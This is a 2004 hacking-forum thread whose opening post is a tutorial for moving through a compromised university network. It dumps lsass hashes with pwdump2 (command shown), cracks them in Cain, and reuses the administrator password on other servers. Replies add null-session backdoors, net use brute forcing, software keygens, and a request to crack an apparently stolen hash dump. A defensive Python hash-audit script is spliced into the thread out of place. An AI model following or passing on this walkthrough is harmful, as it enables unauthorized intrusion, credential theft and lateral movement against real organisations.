Progressor
Feb 4 2004, 08:10 AM
Imagine the situation: you've hacked a stro using one of the exploits, and this stro is very fast (university), so you want to hack some more stros from this subnet. But all the other servers are invulnerable to your exploits. What can you do? It's a usual situation that an admin of the network uses the same password on each machine, so the problem is to discover this password. Download a nice program called "Cain" from www.oxid.it . Then run tlist on your stro, you'll get:
CODE:
smss.exe 612
csrss.exe 660
winlogon.exe 684
services.exe 728
lsass.exe 740
svchost.exe 908
svchost.exe 968
svchost.exe 1052
svchost.exe 1072
spoolsv.exe 1288
Avsynmgr.exe 1372
cisvc.exe 1384
Now, you type this command: pwdump2 [PID lsass.exe] >pass.txt
In our case it will be: pwdump2 740 >pass.txt
You will see the hashes of all accounts:
CODE:
Administrator:500:a1a11bac18e44431aad3b435b51404ee:02b58cf4414428592c9d4e92789edffb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:1704fcfb70f5dd3a7f31b12ffdbf6b8e:e6331acad40185335126799f1d1777fe:::
VUSR_SERVER:1004:2099121e60019c2dc81a1befd3d77a5d:65f828d66f15bac2ce55c248186ee087:::
Now, download a nice wordlist, it contains more than 15,000,000 words: http://download.elcomsoft.com/english.zip
Run Cain, go to Configure - Dictionary, change the file to english.txt, remove all options except the "two numbers hybrid brute" one (a very useful option). Go to Cracker - LM&NTLM Hashes, right click on the table - Add to list, add your pass.txt. Then right click on the account and choose dictionary attack or brute force attack. BTW, Cain supports rainbow hash tables. If you find the admin's password, you might be able to hack more servers on this subnet.
Copkill
Feb 4 2004, 08:33 AM
The admin account is: Administrator 5090, 32 sec. with LC4. I think LC4 is the best tool to crack admin passes. Thx for this TUT, I will test Cain & Abel.
Progressor
Feb 4 2004, 08:52 AM
LC4 doesn't support Rainbow tables.
derquakecommander
Feb 4 2004, 09:19 AM
yes, but the brute from LC4 is (filtered) good, 4h max, and I have a pass A-Z 0-9
mrBob
Feb 4 2004, 12:02 PM
hmm, interesting, thanx a lot, gonna test it locally
ducky
Feb 4 2004, 12:16 PM
Hmmzzz thanks for the tut and all... But how could you know whether there is a network there?? Cuz cracking passes of the local PC is pretty useless if you already hacked it...
Cheerz.
DreamS
Feb 4 2004, 12:24 PM
thanx for this nice tut
Progressor
Feb 4 2004, 12:30 PM
QUOTE (ducky @ Feb 4 2004, 12:16 PM): Hmmzzz thanks for the tut and all... But how could you know whether there is a network there?? Cuz cracking passes of the local PC is pretty useless if you already hacked it... Cheerz.
If the hacked PC belongs to university or big company, you can be sure that there is a network.
Demoman
Feb 4 2004, 01:07 PM
QUOTE: Hmmzzz thanks for the tut and all... But how could you know whether there is a network there?? Cuz cracking passes of the local PC is pretty useless if you already hacked it...
That's not right. When you have cracked the password, you have a really nice backdoor (when port 139 is open). Then you can always access the server with an IPC null session.
I don't know; if port 139 is closed there must be a way to open it, and so you can always access the server.
Greetings Demoman
AsuKa
Feb 4 2004, 01:39 PM
QUOTE: That's not right. When you have cracked the password, you have a really nice backdoor (when port 139 is open). Then you can always access the server with an IPC null session.
Also, don't forget about port 445, you can establish a null session through that as well.
Many thanks for this tut, seems very simple, will have to add to my collection.
JEvel
Feb 4 2004, 01:56 PM
It took 3 sec with JTR to crack the administrator pass.
Antil
Feb 4 2004, 02:13 PM
thanx for the tut dude, I always use LC4 but this is nice 2!
TheAngel
Feb 4 2004, 05:52 PM
I know this way, but somehow when I'm cracking the pass and trying to hack other computers on the same network with it as the NT pass, it seems that the password is incorrect.
tuamamma
Feb 4 2004, 08:05 PM
But how to use rainbow tables?
kuhler
Feb 4 2004, 09:25 PM
Hi
Tools for cracking NT/W2K or XP accounts:
LC4 is a nice tool, but if the password is longer than 8 letters and alphanumeric you're (filtered)!
Cain is very useful! It's a powerful all-round tool for sniffing, cracking etc.
I have found "pwsex" from Elcomsoft (http://www.elcomsoft.com/pwsex.html). I think that's the new version of ANTexp. It supports rainbow tables... that's fast!
Sometimes it's better if you crack the FTP password (if you know the username). On Windows systems the passwords are often the same...
let's rulez!
nulladd
Feb 5 2004, 04:19 AM
QUOTE (kuhler @ Feb 5 2004, 08:25 AM): LC4 is a nice tool, but if the password is longer than 8 letters and alphanumeric you're (filtered)!
I cracked my 11-character alphanumeric password with LC4 in about an hour (none of the parts were in a dictionary either).
damulint
Feb 5 2004, 06:30 AM
I often do password-guessing cracking in other network segments. I got a lot of information from your tutorial. Thank you. I often use Cain. But the company is down on the same segment, hub and switch. Cain & Abel is so strong. Bye bye.
TriHFH
Feb 5 2004, 07:56 AM
QUOTE (nulladd @ Feb 5 2004, 04:19 AM):
QUOTE (kuhler @ Feb 5 2004, 08:25 AM): LC4 is a nice tool, but if the password is longer than 8 letters and alphanumeric you're (filtered)!
I cracked my 11-character alphanumeric password with LC4 in about an hour (none of the parts were in a dictionary either).
You were able to crack an 11-char password because of the weakness of LanManager hashes. LC4, along with the others, cracks each password in segments of 7 chars. So it tries half of the LanMan hash first, then tries to crack the second half. And for those of you who are wondering about rainbow tables, RainbowCrack is definitely the way to go. For the alphanumeric charset, generating the tables on a fairly new computer will take a few days. After that, cracking LanMan, MD5, or SHA1 hashes (you must generate separate sets of tables for each) is a breeze.
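An added example, written here for this thread and not taken from any post or from any of the tools named above (Cain, LC4, pwdump2): a small defender-side audit of a pwdump-format dump like the ones posted at the top of the thread. It applies TriHFH's point about the two independent 7-character halves of a LanManager hash: the LM hash is stored as two separately computable 8-byte halves, so when the second half equals the well-known empty-half value `aad3b435b51404ee` (visible in the Guest line of both dumps above) the password is at most 7 characters, and when the whole LM hash is the empty value the account has no LM hash stored at all. It also flags the NT hash of the empty password (`31d6cfe0d16ae931b73c59d7e0c089c0`, again from the Guest line) and NT hashes shared between accounts, which is exactly the "same password on every machine" situation the first post relies on. The sample dump is constructed for this example; only the two constants come from the page.

```python
"""Audit a pwdump-style hash dump (user:RID:LM_hash:NT_hash:::) for weak storage.

Added example, not from the thread or any tool it names. Findings are tags a
defender can act on: disable LM hash storage (NoLMHash), enforce length > 7,
and eliminate passwords shared across accounts or hosts.
"""
import re
from collections import defaultdict

# Well-known constants; both appear in the Guest lines of the dumps in this thread.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" / LM storage disabled
EMPTY_LM_HALF = EMPTY_LM_HASH[:16]                 # one unpopulated 7-char half
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed sample dump: the hex values are made up, only the format is real.
SAMPLE_DUMP = """\
Administrator:500:5e5a6b2a7d0e4f1c3b9d8c7e6f5a4b3c:9f1a2b3c4d5e6f708192a3b4c5d6e7f8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
backup:1004:5e5a6b2a7d0e4f1c3b9d8c7e6f5a4b3c:9f1a2b3c4d5e6f708192a3b4c5d6e7f8:::
svc_print:1005:7a2b9c0d1e2f3a4baad3b435b51404ee:0a1b2c3d4e5f60718293a4b5c6d7e8f9:::
jdoe:1006:aad3b435b51404eeaad3b435b51404ee:c0ffee00c0ffee00c0ffee00c0ffee00:::
this line is not a hash record and is skipped
"""


def parse_pwdump(text):
    """Parse dump lines into records; malformed lines are skipped, hashes lower-cased."""
    records = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        user, rid, lm, nt = m.groups()
        records.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return records


def audit(records):
    """Return {user: [finding tags]} for every account with at least one weakness."""
    findings = defaultdict(list)
    users_by_nt = defaultdict(list)
    for r in records:
        users_by_nt[r["nt"]].append(r["user"])
        if r["nt"] == EMPTY_NT_HASH:
            findings[r["user"]].append("empty-password")
        if r["lm"] != EMPTY_LM_HASH:
            # An LM hash is stored, so the password is crackable in 7-char halves.
            findings[r["user"]].append("lm-hash-stored")
            if r["lm"][16:] == EMPTY_LM_HALF:
                # Second half is the hash of seven NULs: password is <= 7 chars.
                findings[r["user"]].append("password-7-chars-or-less")
    # Identical NT hashes mean identical passwords (no salt in NT hashes).
    for nt, users in users_by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT_HASH:
            for u in users:
                others = ",".join(x for x in users if x != u)
                findings[u].append("password-shared-with:" + others)
    return dict(findings)


def audit_text(text):
    """Convenience wrapper: parse then audit."""
    return audit(parse_pwdump(text))


if __name__ == "__main__":
    for user, tags in sorted(audit_text(SAMPLE_DUMP).items()):
        print(f"{user}: {', '.join(tags)}")
```

On the constructed sample the audit reports `Guest` as empty-password, `svc_print` as having an LM hash whose second half is unpopulated (7 characters or fewer), and `Administrator` and `backup` as sharing one password; `jdoe`, with LM storage disabled and a unique NT hash, produces no finding. Note that NT hashes are unsalted, which is why equality of the hash alone proves equality of the password across accounts and across machines.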
Krogoth
Feb 6 2004, 08:40 AM
Thank you for the tips Progressor. I'm grabbing the files and will test it on my network. Just a question if you don't mind: what is the tool to copy a file from puter A to puter B on the same network? You can send me a PM if you want.
I know DameWare will be able to do that, but let's keep it out of the list atm.
AsuKa
Feb 6 2004, 08:50 AM
QUOTE: Thank you for the tips Progressor. I'm grabbing the files and will test it on my network. Just a question if you don't mind: what is the tool to copy a file from puter A to puter B on the same network?
hmm, feeling helpful today:
net use z: \\computer\share
xcopy /e c:\files\ z:\folder
Krogoth
Feb 6 2004, 04:59 PM
Hey Asuka, thank you man. I've never thought that command could be applied remotely from box A -> B. Silly me, lol. I'm always thinking that I can only apply that from my local box to a remote one. Well, too much drinking makes my brain messy.
blazeking
Feb 6 2004, 07:10 PM
QUOTE (Copkill @ Feb 4 2004, 08:33 AM): I think LC4 is the best tool to crack admin passes.
Is there any way I can brute force hack a password without having to buy LC4?
yarma
Feb 6 2004, 08:04 PM
There are a lot of other crackers, and if you want to use LC4, you can find a keygen on Google.
blazeking
Feb 6 2004, 09:56 PM
That's legal, right?
I know this is a noob question, but hey, that's what I am...
Where do you use tlist? I am learning bash, is it in another shell? Why have I never heard of this command...
mr_quick
Feb 7 2004, 01:10 PM
i'll try this tips...
randalizm
Feb 7 2004, 01:36 PM
Haven't most ISPs blocked port 139 since the "Blaster" virus/worm, therefore making NetBIOS hacking a thing of the past???? And yes Blazeking, you can, with a batch script that reads words n shit from a txt file and then echoes the words to a net use command, trying each one until you're in! There is a batch script on the site somewhere I saw but forgot whereabouts, I'll try finding it now. Other than the batch script you need a properly formatted word list and the remote computer's IP n stuff. Or alternatively you could just find a keygen to LC4 (Google).
blazeking
Feb 11 2004, 05:03 PM
QUOTE: There is a batch script on the site somewhere I saw but forgot whereabouts, I'll try finding it now. Other than the batch script you need a properly formatted word list and the remote computer's IP n stuff.
A properly formatted word list? Where would I get this? Or how would I make it? Just point me in the right direction... I can read if this is too noob, I just have to know what to read and where to do that.
oYost
Feb 13 2004, 01:37 AM
It's working like a charm, very nice, thanks a lot
DrI
Feb 13 2004, 06:48 AM
QUOTE (blazeking @ Feb 6 2004, 09:56 PM): That's legal, right?
Of course not
PL3X59
Feb 13 2004, 09:37 AM
Hi guys, I'm French, I like the web site and want to say that this is a NICE TOOL :-) But do you know the nt2kxp cracker with John the Ripper's module? I tried it on a 2003 server but it doesn't work. Does pwdump2 work on 2003 server? Thx, bye bye
randalizm
Feb 13 2004, 02:58 PM
OK, well, if you have LC4 there will be a fairly basic one with that; otherwise I guess you should check the first post in this thread! I hope that helps you out.
Starlight
Mar 30 2004, 06:53 PM
Hello all, I found these as passwords:
Unfortunately, I did not succeed in decrypting them by brute force with all the characters and all the numbers and all the special characters too, with Cain and with pwsex.
Is there someone who knows how I can decrypt these codes? I would really like to have the administrator password.
CODE:
Administrator:500:97a96968149f7bec6d3a627c824f029f:2d39101570c0c96c5b88de6682feaf1e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_LIBPROXY:1000:d6b40f5967b35c2e69fa2f58b6e03ff9:e1d2f646a313c6944a88c6fa37c5a53b:::
IWAM_LIBPROXY:1002:7e7c0a16217dcafc57a24b3005d0da52:b888222ed4b297ede77c7c56cc994b83:::
kbrady:1004:c19ee4163f76f3ad4bceae59e5d1c0cb:21dd8f8d8aa444ff7d824ba48d9fb2d4:::
ltc:1007:884923c46c5d326caad3b435b51404ee:af284184490b6317e9a88b2bc047d935:::
Patrick:1008:884923c46c5d326caad3b435b51404ee:af284184490b6317e9a88b2bc047d935:::
sean:1006:97a96968149f7bec6d3a627c824f029f:2d39101570c0c96c5b88de6682feaf1e:::
students:1003:b7c7f044cdeb84b7aad3b435b51404ee:859f626c96975d802da4730c3dfdea3e:::
sunline:1009:387bcc7bfdddee33aad3b435b51404ee:0c7763e748e656e2742b726c93db3d25:::
Thank you all.
Starlight
Mar 30 2004, 06:53 PM
We can launch a contest if you prefer, for the first one who is able to decrypt it.
iWeasel410
Mar 30 2004, 09:38 PM
Nice tut, Cain is probably the best brute cracker I've come across.
Reckless
Mar 31 2004, 07:35 AM
I use LC4. It gives pretty good results... it took about 4 hours to crack my password, which was laxuqo27.
romaricmichon
Mar 31 2004, 07:57 AM
I don't think that LC4 is such a great program, because with a strong password it needs 26 to crack it. I think using RainbowCrack is a much better way.
Kross
Apr 1 2004, 01:01 PM
Hi, where can I get LC4? And the passlist is down. Can u upp it?
ZoraX
Apr 1 2004, 06:54 PM
http://download.elcomsoft.com/english.zip doesn't work, and I can't find any good results with Google. Can someone get a new link, or upload it to the board? This is a good method, it cracked my password (with brute force) after 4 hours...
blahplok
Apr 1 2004, 11:24 PM
If we have the account IUSR_COMPNAME, how can we crack the pass on NT? I have used programs like getadmin.exe but it's dead, the anti-virus detects getadmin.exe..... Can anybody help me???
qcred11
Apr 2 2004, 03:24 AM
getadmin is too old, it's not gonna help you. By the way, try SAMInside. It's much faster than LC4. Here is the link: http://www.topshareware.com/SAMInside-download-5188.htm
It's really good.
dr0zaxx
Apr 2 2004, 12:34 PM
Usually, in order to crack the password, you need to have admin rights. This tutorial is only for those who have done that; for those who haven't it's probably useless, but it's good to read it for knowledge.
axelfoley643
Apr 2 2004, 01:13 PM
mmm interesting
nuorder
Apr 2 2004, 01:55 PM
Does anybody have performance comparisons between LM brute forcers (hashes per second on certain spec machines)? If not I'll probably test em all.
dr0zaxx
Apr 2 2004, 02:12 PM
QUOTE: Does anybody have performance comparisons between LM brute forcers (hashes per second on certain spec machines)? If not I'll probably test em all.
There might be tools out there that do the same thing that we don't even know of, maybe faster than LC4 and rainbow tables or pwsex.
nuorder
Apr 2 2004, 02:37 PM
That's why I asked, actually... there are several versions of the DES algorithm floating around, some modded from OpenSSL, so I'm thinking, why not replace the RainbowCrack one with an optimised version (it even states this on the site: RainbowCrack only uses standard OpenSSL DES).
IIzedII
Apr 3 2004, 10:09 AM
Is it possible to get the hashes through a user account, or do I need an administrator account to get them??
THX!
3plx
Apr 13 2004, 06:03 PM
Yes, it's possible if u have upload and execute axx. BTW guyz, I have cracked the admin password; when I do "net view" I get several computers. Can I do something with them? plz help
roger_girardin
Apr 14 2004, 01:49 AM
Very interesting topic, I am addicted to my favourite.
obs1: I think it's possible to change the current user right on the comp reboot. obs2: port 139 disabled
==> I don't know how an ISP can do it on a remote comp; it can make a blocking redirection on its router, but it doesn't affect your LAN's comps.
So if you have access to the LAN's comps, you can use that door even if the ISP has blocked its access (I thought the net worm spreaders use ports 135 and 137, as my firewall shows it).
lol
Flowers
Apr 14 2004, 12:00 PM
Do you know a brute force cracker which can work on many computers on NetBSD via SSH login? For passwords of 10 characters or more, this could be helpful.
enemc
Apr 21 2004, 09:58 PM
Hi, first of all thx for the tutorial, it has been very useful.. but I have a problem.. every time I use a pass cracking tool such as Cain or LC3 I have a CPU usage of 100%... my CPU gets too hot and sooner or later I will be able to grill some ham and eggs or a steak on it =) .. that could be an advantage if you want to have a good barbecue with your neighbours, but I definitely just want to crack the pass.. solutions? edit: system information: P4 2.8 GHz and MSI mb running Win NT 5.1 SP1